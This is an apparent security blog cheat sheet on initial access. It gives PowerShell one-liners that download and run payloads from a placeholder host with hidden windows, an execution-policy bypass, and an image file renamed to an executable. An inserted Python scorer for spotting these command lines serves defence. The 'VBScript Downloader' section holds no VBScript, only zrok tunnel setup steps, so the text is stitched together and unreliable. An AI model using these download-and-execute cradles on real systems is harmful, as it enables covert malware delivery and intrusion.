
Initial Access: PowerShell Cheat Sheet

 ·  ☕ 1 min read  ·  🐱 thik

Below are methods for downloading payloads from the Internet.

Based On

  • PowerShell
  • VBScript
  • Batch Script

Method 1 - PowerShell Downloader

# Download and Execute Payload (PS1)
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.x.x:8081/test.ps1')"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.x.x:8081/test.ps1'))"

# ./test.ps1 => Start-Process 'C:\windows\system32\calc.exe'
# Download/Save/Execute
PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.x.x:8081/cat.jpg','%temp%\putty.exe'); Start-Process '%temp%\putty.exe'

PowerShell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source http://192.168.x.x:8081/cat.jpg -Destination $env:temp\cat.exe; Start-Process $env:temp\cat.exe
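
Detection side of Method 1, as an added example that is not part of the original post: a Python scorer for process command lines that keys on the flags and cmdlets used above and on the cat.jpg to .exe rename. The indicator names, weights, threshold and the constructed sample lines are assumptions for illustration.

```python
import posixpath
import re
from urllib.parse import urlparse

# (name, regex, weight): flags and cmdlets used by the one-liners in Method 1.
INDICATORS = [
    ("no_profile",    r"(?<![\w-])-nop[a-z]*\b", 1),
    ("hidden_window", r"(?<![\w-])-w[a-z]*\s+hidden\b", 2),
    ("policy_bypass", r"(?<![\w-])-e[a-z]*\s+bypass\b", 2),
    ("web_download",  r"\.download(string|file)\s*\(", 3),
    ("bits_download", r"\bstart-bitstransfer\b", 3),
    ("invoke_expr",   r"\b(iex|invoke-expression)\b", 3),
    ("start_process", r"\bstart-process\b", 1),
    ("temp_path",     r"%temp%|\$env:temp", 1),
]
URL = re.compile(r"https?://[^\s'\"]+", re.I)
EXEC_EXT = re.compile(r"\.(exe|dll|scr|bat|cmd|vbs|ps1)\b", re.I)

def score(cmdline):
    """Return (total, indicator names) for one process command line."""
    hits = [(n, w) for n, rx, w in INDICATORS if re.search(rx, cmdline, re.I)]
    url = URL.search(cmdline)
    if url:
        # Source URL does not look executable, but the text after it (the
        # destination argument) names an executable: cat.jpg -> putty.exe.
        ext = posixpath.splitext(urlparse(url.group()).path)[1]
        if not EXEC_EXT.fullmatch(ext) and EXEC_EXT.search(cmdline[url.end():]):
            hits.append(("ext_mismatch", 3))
    return sum(w for _, w in hits), [n for n, _ in hits]

# Constructed sample of process-creation command lines (for example from
# Event ID 4688 with command-line auditing); the last one is a benign job.
SAMPLE = r"""
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.x.x:8081/test.ps1')"
PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.x.x:8081/cat.jpg','%temp%\putty.exe'); Start-Process '%temp%\putty.exe'
PowerShell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source http://192.168.x.x:8081/cat.jpg -Destination $env:temp\cat.exe; Start-Process $env:temp\cat.exe
powershell.exe -NoProfile -File C:\Scripts\backup.ps1
""".strip().splitlines()

def triage(lines, threshold=5):
    """Return (score, indicators, line) for every line at or above threshold."""
    scored = [(*score(l), l) for l in lines]
    return [s for s in scored if s[0] >= threshold]

if __name__ == "__main__":
    for total, names, line in triage(SAMPLE):
        print(f"{total:>2} {','.join(names)} :: {line[:60]}")
```

The scorer matches plain-text command lines only; encoded or obfuscated invocations need script block logging rather than string matching.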

Method 2 - VBScript Downloader

' Download and Execute Payload

Go to https://docs.zrok.io/docs/getting-started/ and download the build that matches your server's platform. Here I will use Linux as the server.

wget https://github.com/openziti/zrok/releases/download/v0.4.31/zrok_0.4.31_linux_arm64.tar.gz -O zrok.tar.gz

Extract the archive and you will get the main file, zrok.

Open a terminal and type the following command:

./zrok invite

Then enter your email address to register for the service.

Zrok Invite

For the listener and beacons, see my previous article, which uses Telebit to create them.

WRITTEN BY
thik
Security Researcher